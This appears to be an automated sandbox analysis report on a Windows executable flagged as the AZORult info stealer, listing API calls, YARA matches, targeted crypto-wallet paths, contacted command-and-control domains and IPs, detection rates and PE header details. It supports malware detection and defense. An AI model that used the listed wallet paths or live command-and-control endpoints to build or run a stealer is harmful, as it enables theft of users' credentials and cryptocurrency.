Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW@
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h] 0_2_00407AF0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h] 0_2_0046052B
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h] 0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h] 0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h] 0_2_00460AFD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h] 0_2_004A0408
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: GetLocaleInfoA, 0_2_00404BA8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 0_2_00404C71
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004065F0 GetUserNameW, 0_2_004065F0

                  Stealing of Sensitive Information:

Yara detected Azorult
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Detected AZORult Info Stealer
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004186C4 | 0_2_004186C4
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | Code function: 0_2_004186C4 | 0_2_004186C4
Yara detected Azorult Info Stealer
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: electrum.dat
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %appdata%\Electrum\wallets\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | String found in binary or memory: %appdata%\Electrum-LTC\wallets\

                  Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | Security Software Discovery 11 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Security Account Manager | System Owner/User Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 114 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

                  Behavior Graph

                  Screenshots


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

Source | Detection | Scanner | Label
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | 69% | Virustotal |
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | 75% | ReversingLabs | Win32.Infostealer.Coins
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | 100% | Avira | HEUR/AGEN.1125422
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

Source | Detection | Scanner | Label
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125422

                  Domains

Source | Detection | Scanner | Label
admin.svapofit.com | 9% | Virustotal |
survey-smiles.com | 8% | Virustotal |
ww1.survey-smiles.com | 9% | Virustotal |

                  URLs

Source | Detection | Scanner | Label
http://ww1.survey-smiles.com/% | 100% | Avira URL Cloud | phishing
http://ww1.survey-smiles.com/e | 100% | Avira URL Cloud | phishing
http://admin.svapofit.= | 0% | Avira URL Cloud | safe
http://admin.svapofit.com/azs/index.php8 | 0% | Avira URL Cloud | safe
http://survey-smiles.com/= | 0% | Avira URL Cloud | safe
http://survey-smiles.com/csvc | 0% | Avira URL Cloud | safe
http://survey-smiles.com/ | 0% | Avira URL Cloud | safe
http://admin.svapofit.com/azs/index.phpSb | 0% | Avira URL Cloud | safe
https://dotbit.me/a/ | 0% | URL Reputation | safe
http://admin.svapofit.com/ | 0% | Avira URL Cloud | safe
http://ww1.survey-smiles.com/z | 100% | Avira URL Cloud | phishing
http://admin.svapofit.com/azs/index.php | 0% | Avira URL Cloud | safe
http://ww1.survey-smiles.com/sof | 100% | Avira URL Cloud | phishing
http://ww1.survey-smiles.com/ | 100% | Avira URL Cloud | phishing
http://survey-smiles.c-k | 0% | Avira URL Cloud | safe
http://survey-smiles.com | 0% | Avira URL Cloud | safe

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
admin.svapofit.com | 63.141.242.43 | true | true | | unknown
survey-smiles.com | 5.79.68.108 | true | false | | unknown
12065.BODIS.com | 199.59.242.153 | true | false | | high
ww1.survey-smiles.com | unknown | unknown | false | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://survey-smiles.com/ | false | Avira URL Cloud: safe | unknown
http://admin.svapofit.com/azs/index.php | true | Avira URL Cloud: safe | unknown
http://ww1.survey-smiles.com/ | true | Avira URL Cloud: phishing | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://ww1.survey-smiles.com/% | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp | true | Avira URL Cloud: phishing | unknown
http://ww1.survey-smiles.com/e | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | true | Avira URL Cloud: phishing | unknown
http://admin.svapofit.= | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
http://admin.svapofit.com/azs/index.php8 | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://survey-smiles.com/= | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://survey-smiles.com/csvc | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.icq.com/legal/eula/en | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | false | | high
http://admin.svapofit.com/azs/index.phpSb | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://ip-api.com/json | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | false | | high
https://dotbit.me/a/ | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | false | URL Reputation: safe | unknown
http://www.icq.com/legal/privacypolicy/en | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | false | | high
http://admin.svapofit.com/ | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://ww1.survey-smiles.com/z | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp | true | Avira URL Cloud: phishing | unknown
http://ww1.survey-smiles.com/sof | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp | true | Avira URL Cloud: phishing | unknown
http://survey-smiles.c-k | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://survey-smiles.com | 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                          Contacted IPs


                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
5.79.68.108 | survey-smiles.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01 Netherlands NL | false
199.59.242.153 | 12065.BODIS.com | United States | 395082 | BODIS-NJ US | false
63.141.242.43 | admin.svapofit.com | United States | 33387 | NOCIX US | true

                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491841
Start date: 28.09.2021
Start time: 00:48:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 96.5% (good quality ratio 93.2%)
• Quality average: 79.5%
• Quality standard deviation: 28.8%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 20.54.110.249, 40.112.88.60, 93.184.221.240, 20.199.120.85, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.199.120.151, 20.199.120.182
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs


                          Domains


                          ASN

                          • 199.59.242.153
                          Factura proforma adjunta.exeGet hashmaliciousBrowse
                          • 199.59.242.150
                          RFQ.Order 0128-44.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          K.exeGet hashmaliciousBrowse
                          • 199.59.242.150
                          0001.exeGet hashmaliciousBrowse
                          • 199.59.242.150
                          PAYMENT ADVICE.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          rex for fs2004__3039_i1291358365_il1363251.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          BIN.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          U8mrImRa5n.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          purchase order No. 00109877 pdf.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          XTRA POWER SOLAR PRODUCTS - OFF GRID 2021-8-23.xlsxGet hashmaliciousBrowse
                          • 199.59.242.153
                          scancopy.exeGet hashmaliciousBrowse
                          • 199.59.242.153
                          0Ol5vRsauA.exeGet hashmaliciousBrowse
                          • 199.59.242.153

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.398979169143917
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
                          File size:208384
                          MD5:73bd76f0549cc1992d943ddfd92a9c4d
                          SHA1:802e70b76c7c0860b3a4a257b1bc96fc3430ff01
                          SHA256:2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
                          SHA512:4a524d1a552eb6d101f9ceb25c7dc608669eeca7dc99bc5ddc2b9d7d3c8f4ffd3cd8f12c3328b07d80888d6758aff970b3e6898f88c3451a058224b83007e521
                          SSDEEP:3072:ayzKqAOparE8YPbtMrxH5C000IS7IrfAgneF9RUQo6qHqn/PNAyv:nefOUGPbtMru00JD09RUQzqHOXN
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y..{7..{7..{7..)...{7..)...{7..)...{7.Qtj..{7..{6..y7...Y..{7...K..{7..)...{7.Rich.{7.................PE..L.....][...........

                          File Icon

                          Icon Hash:00828e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x40d563
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x5B5D7FF4 [Sun Jul 29 08:51:00 2018 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:32bb5b6675247577e2dc1b39cb495d8f

                          Entrypoint Preview

                          Instruction
                          call 00007FBD948785BBh
                          jmp 00007FBD9487603Dh
                          nop
                          nop
                          push ebp
                          push esp
                          pop ebp
                          push esi
                          push dword ptr [00430D48h]
                          mov esi, dword ptr [00401434h]
                          call esi
                          or eax, eax
                          je 00007FBD948761E3h
                          mov eax, dword ptr [00430D44h]
                          cmp eax, FFFFFFFFh
                          je 00007FBD948761D9h
                          push eax
                          push dword ptr [00430D48h]
                          call esi
                          call eax
                          or eax, eax
                          je 00007FBD948761CAh
                          mov eax, dword ptr [eax+000001F8h]
                          jmp 00007FBD948761E9h
                          mov esi, 00401970h
                          push esi
                          call dword ptr [00401650h]
                          or eax, eax
                          jne 00007FBD948761CDh
                          push esi
                          call 00007FBD948776A5h
                          pop ecx
                          or eax, eax
                          je 00007FBD948761DAh
                          push 00401960h
                          push eax
                          call dword ptr [00401544h]
                          or eax, eax
                          je 00007FBD948761CAh
                          push dword ptr [ebp+08h]
                          call eax
                          mov dword ptr [ebp+08h], eax
                          mov eax, dword ptr [ebp+08h]
                          pop esi
                          pop ebp
                          ret
                          push 00000000h
                          call 00007FBD9487614Ch
                          pop ecx
                          ret
                          pushfd
                          popfd
                          push ebp
                          push esp
                          pop ebp
                          push esi
                          push dword ptr [00430D48h]
                          mov esi, dword ptr [00401434h]
                          call esi
                          or eax, eax
                          je 00007FBD948761E3h
                          mov eax, dword ptr [00430D44h]
                          cmp eax, FFFFFFFFh
                          je 00007FBD948761D9h
                          push eax
                          push dword ptr [00430D48h]
                          call esi
                          call eax
                          or eax, eax
                          je 00007FBD948761CAh
                          mov eax, dword ptr [eax+000001FCh]
                          jmp 00007FBD948761E9h
                          mov esi, 00401970h
                          push esi
                          call dword ptr [00001650h]

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2008 build 21022
                          • [RES] VS2005 build 50727
                          • [ASM] VS2008 build 21022
                          • [C++] VS2005 build 50727
                          • [LNK] VS2008 build 21022
                          • [C++] VS2008 build 21022

                          Data Directories

                           Name | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14030 | 0xb4 | .text
                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x2dc0 | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2aa8 | 0x40 | .text
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x930 | .text
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                          Sections

                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                           .text | 0x1000 | 0x161e8 | 0x16200 | False | 0.515724311441 | data | 6.44383361512 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                           .data | 0x18000 | 0x2e57c | 0x19a00 | False | 0.732269435976 | data | 6.10591438138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                           .rsrc | 0x47000 | 0x2dc0 | 0x2e00 | False | 0.323029891304 | data | 4.01557616695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                           Name | RVA | Size | Type | Language | Country
                           RT_DIALOG | 0x473d0 | 0x27e | data | |
                           RT_DIALOG | 0x47650 | 0x5a0 | data | |
                           RT_DIALOG | 0x47bf0 | 0x472 | data | |
                           RT_DIALOG | 0x48068 | 0x394 | data | |
                           RT_DIALOG | 0x48400 | 0x21e | data | |
                           RT_DIALOG | 0x48620 | 0xe0 | data | |
                           RT_DIALOG | 0x48700 | 0x234 | data | |
                           RT_DIALOG | 0x48938 | 0x192 | data | |
                           RT_DIALOG | 0x48ad0 | 0xe8 | data | |
                           RT_DIALOG | 0x48bb8 | 0x34 | data | |
                           RT_STRING | 0x48bf0 | 0xc4 | data | |
                           RT_STRING | 0x48cb8 | 0xcc | data | |
                           RT_STRING | 0x48d88 | 0x174 | data | |
                           RT_STRING | 0x48f00 | 0x39c | data | |
                           RT_STRING | 0x492a0 | 0x34c | data | |
                           RT_STRING | 0x495f0 | 0x294 | data | |
                           RT_VERSION | 0x49888 | 0x348 | data | |
                           RT_MANIFEST | 0x49bd0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                          Imports

                           DLL | Import
